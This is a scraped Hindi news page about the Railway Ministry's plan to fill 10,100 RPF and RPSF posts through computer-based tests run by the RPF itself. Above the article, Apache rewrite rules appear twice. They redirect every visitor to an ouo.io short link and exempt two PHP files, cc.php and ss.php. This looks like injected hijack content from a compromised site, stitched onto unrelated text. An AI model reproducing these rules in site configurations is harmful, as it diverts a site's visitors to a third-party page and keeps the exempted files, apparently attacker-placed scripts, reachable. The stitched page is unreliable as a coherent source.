
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 692
Previousजयपुर। पिछले कई सालों से खाली पड़े पदों को भरने के लिए रेल मंत्रालय आरपीएफ और आरपीएसएफ में 10100 पदों पर भर्तियां करेगा। रेलवे ने इसके लिए प्रक्रिया शुरू कर दी है। 10100 पदों में सब इंस्पेक्टर के 1100 एवं कांस्टेबल के 9000 पद शामिल हैं। उत्तर पश्चिम रेलवे में इन भर्तियों से 35 सब इंस्पेक्टर एवं 178 कांस्टेबल के नए पद सृजित होंगे। भर्तियां ऑनलाइन होंगी तथा मई में आवेदन प्रक्रिया शुरू होगी। भर्ती से जुड़ी पूरी प्रक्रिया आरपीएफ प्रशासन खुद संभालेगा। रेलवे बोर्ड के एक वरिष्ठ अधिकारी ने बताया कि पहले परीक्षा रेलवे भर्ती बोर्ड (आरआरबी) के माध्यम से करवाई जाने की तैयारी थी लेकिन बोर्ड ने पूर्व में की जा रही भर्तियों का दबाव बताते हुए परीक्षा के आयोजन को लेकर असमर्थता जताई। जिसके बाद अब आरपीएफ ने ही भर्ती कराने का फैसला किया है। आरपीएफ ही इस भर्ती परीक्षा से जुड़ी फिजिकल, मेडिकल व अन्य प्रक्रियाओं को पूरा करेगा। आरपीएफ पहली बार इन पदों के लिए कम्प्यूटर आधारित परीक्षा (सीबीटी) आयोजित करेगा।